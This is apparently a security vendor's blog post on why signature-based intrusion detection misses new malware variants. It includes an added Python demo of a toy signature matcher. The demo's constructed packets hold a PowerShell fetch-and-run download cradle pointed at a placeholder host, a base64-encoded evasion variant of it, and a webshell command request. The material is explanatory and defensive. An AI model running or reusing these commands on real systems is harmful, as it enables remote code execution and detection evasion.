What You Hate About Your IDPS – It Doesn’t Detect Enough
One of the chief complaints our customers have about their legacy Intrusion Detection and Prevention Systems (IDPS) is that they flood their SOC with alerts. However, IDPS shortcomings run deeper than this: too often they don't detect enough. The problem stems largely from how IDPS products work, and the evolving threat landscape has made it worse.
Let's first look at how a traditional IDPS product works to understand why its detection is so weak.
IDPS Tools and Signature-Based Detection
Traditional IDPS tools use signature-based detection to detect a variety of cyber threats, including exploits targeting vulnerable systems and applications, malware, and phishing attacks. They do so via packet-level inspection: the engine reassembles traffic and compares packet contents (payload byte sequences, regular expressions, protocol header fields such as ports) against a database of signatures that describe known-malicious traffic. This is content matching, not hash comparison; a signature keys on specific bytes that were observed in a known sample. If there's a match, the IDPS triggers an alert and, depending on the configuration, drops the packet or resets the connection.
But IDPS don't work as well as they once did. One reason is the increasing volume of new attacks. Every day, the AV-TEST Institute registers over 350,000 new "malicious programs" (malware) and "potentially unwanted applications" (PUA). Many of these new versions use techniques such as polymorphic code and packers to produce a variant whose bytes no longer match the signature written for the original. We've seen this in our Global Threat Intelligence Network: about 60 percent of malware coming into our customers' networks is unique and engineered to evade detection by signature-based IDPS.
Malware authors know that most security vendors don't create a signature until they start getting samples of new malicious code from multiple customers. Since so much malware is unique, most variants never reach that critical mass with a vendor and therefore never get a signature. Adding to the challenge, most companies don't have the time or expertise to write their own signatures, so they have no signature-based way to protect against these new threats.
In addition, there are types of advanced attacks that easily evade signature-based technology by targeting legitimate processes and applications, such as the PowerShell utility installed by default in Microsoft Windows. Fileless malware, for example, runs in memory through such built-in tools rather than dropping a malicious executable, so there is no file for which a signature can be written, and the command line itself is easily obfuscated or encoded. Designed to avoid signature-based detection by IDPS products, fileless attacks grew by 265 percent in the first half of 2019.
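To make the matching mechanism and the evasion concrete, here is an added example that is not code from the original post or from any vendor's product: a toy content/regex matcher in the style of a Snort or Suricata rule, run over constructed packets. Every rule, SID, URL and payload below is made up for illustration. The three "known" samples match their signatures; the three re-engineered variants (webshell with a renamed parameter, beacon rebuilt with a per-campaign User-Agent, PowerShell cradle sent as an encoded command) carry the same behaviour but pass untouched, which is the gap the paragraphs above describe.

```python
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple


@dataclass
class Rule:
    """A minimal signature in the spirit of a Snort/Suricata rule (hypothetical format).

    'contents' are byte patterns that must all appear in the payload, in order;
    'pcre' is an optional regular expression applied to the whole payload.
    """
    sid: int
    msg: str
    action: str                      # "alert" (detect only) or "drop" (prevent)
    dport: Optional[int] = None      # None = any destination port
    contents: List[bytes] = field(default_factory=list)
    pcre: Optional[re.Pattern] = None


@dataclass
class Packet:
    dport: int
    payload: bytes


def rule_matches(rule: Rule, pkt: Packet) -> bool:
    """Signature matching is content matching, not hashing: every content
    pattern must be found, each after the previous one, and the pcre (if any)
    must match somewhere in the payload."""
    if rule.dport is not None and pkt.dport != rule.dport:
        return False
    pos = 0
    for pattern in rule.contents:
        idx = pkt.payload.find(pattern, pos)
        if idx < 0:
            return False
        pos = idx + len(pattern)
    if rule.pcre is not None and rule.pcre.search(pkt.payload) is None:
        return False
    return True


def inspect(rules: List[Rule], pkt: Packet) -> Tuple[str, List[int]]:
    """Return the IDPS verdict ('drop', 'alert' or 'pass') and the matching SIDs.
    A single 'drop' rule wins over any number of 'alert' rules."""
    hits = [r for r in rules if rule_matches(r, pkt)]
    if any(r.action == "drop" for r in hits):
        return "drop", [r.sid for r in hits]
    if hits:
        return "alert", [r.sid for r in hits]
    return "pass", []


# Constructed rules, written against three (hypothetical) samples a vendor has seen.
RULES = [
    Rule(sid=1000001, msg="HTTP webshell command execution", action="alert", dport=80,
         contents=[b"POST ", b"cmd="],
         pcre=re.compile(rb"cmd=(whoami|id|uname)")),
    Rule(sid=1000002, msg="Known beacon User-Agent", action="drop", dport=80,
         contents=[b"User-Agent: EvilBeacon/1.0"]),
    Rule(sid=1000003, msg="PowerShell download cradle", action="alert",
         contents=[b"powershell", b"IEX"]),
]

# Constructed traffic: the original samples the signatures were written from.
KNOWN_WEBSHELL = Packet(80, b"POST /shell.php HTTP/1.1\r\nHost: x\r\n\r\ncmd=whoami")
KNOWN_BEACON = Packet(80, b"GET /c2 HTTP/1.1\r\nUser-Agent: EvilBeacon/1.0\r\n\r\n")
KNOWN_CRADLE = Packet(445, b"powershell -c IEX(New-Object Net.WebClient).DownloadString('http://x/a')")

# Variant 1: the attacker renames the webshell parameter; the literal "cmd=" is gone.
VARIANT_WEBSHELL = Packet(80, b"POST /shell.php HTTP/1.1\r\nHost: x\r\n\r\nc=/usr/bin/id")
# Variant 2: the beacon is rebuilt with a per-campaign User-Agent (polymorphic build).
VARIANT_BEACON = Packet(80, b"GET /c2 HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (build 8f3a)\r\n\r\n")
# Variant 3: the same cradle via -EncodedCommand (base64 of UTF-16LE), so "IEX" never hits the wire.
_encoded = base64.b64encode(
    "IEX(New-Object Net.WebClient).DownloadString('http://x/a')".encode("utf-16le"))
VARIANT_CRADLE = Packet(445, b"powershell -enc " + _encoded)


def run_demo() -> dict:
    """Inspect each constructed packet and return {name: verdict}."""
    traffic = {
        "known_webshell": KNOWN_WEBSHELL, "known_beacon": KNOWN_BEACON, "known_cradle": KNOWN_CRADLE,
        "variant_webshell": VARIANT_WEBSHELL, "variant_beacon": VARIANT_BEACON,
        "variant_cradle": VARIANT_CRADLE,
    }
    return {name: inspect(RULES, pkt)[0] for name, pkt in traffic.items()}


if __name__ == "__main__":
    for name, verdict in run_demo().items():
        print(f"{name:18s} -> {verdict}")
```

Real engines add protocol normalization (for example decoding HTTP URIs) and fast multi-pattern search, but the conclusion is the same: each signature pins bytes the attacker controls, and every variant that changes those bytes needs a new signature before it is seen again.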
How Organizations Can Protect Themselves
The developments described above illustrate why organizations need to move beyond relying solely on signature-based tools like IDPS for threat detection. This doesn't mean they should get rid of their IDPS, however. IDPS technology still provides value: a well-configured and up-to-date IDPS remains an effective way to detect known threats, which still make up about 40 percent of the malicious traffic we observe in our customers' networks. In addition, many regulatory frameworks continue to require IDPS along with antivirus software and firewalls because they serve as a first line of defense against attacks.
IDPS is a key component that Lastline uses in its network detection and response (NDR) solution. It uses IDPS capabilities to detect known threats entering the network, and continuously updates its signatures to protect against new variations of known threats. The solution then applies both unsupervised machine learning and supervised machine learning to network traffic so that it can detect anomalous activity indicating unknown threats operating inside the network. Lastline’s NDR also uses file analysis to detect malicious behaviors in email and web content and correlates all malicious activity to eliminate false positives and low-fidelity alerts, thereby helping to relieve alert fatigue.
Download 5 Things You Hate About Your IDPS to learn more about the shortcomings of IDPS.
Download our Solution Guide to read about how to replace your ineffective IDPS with Lastline Defender.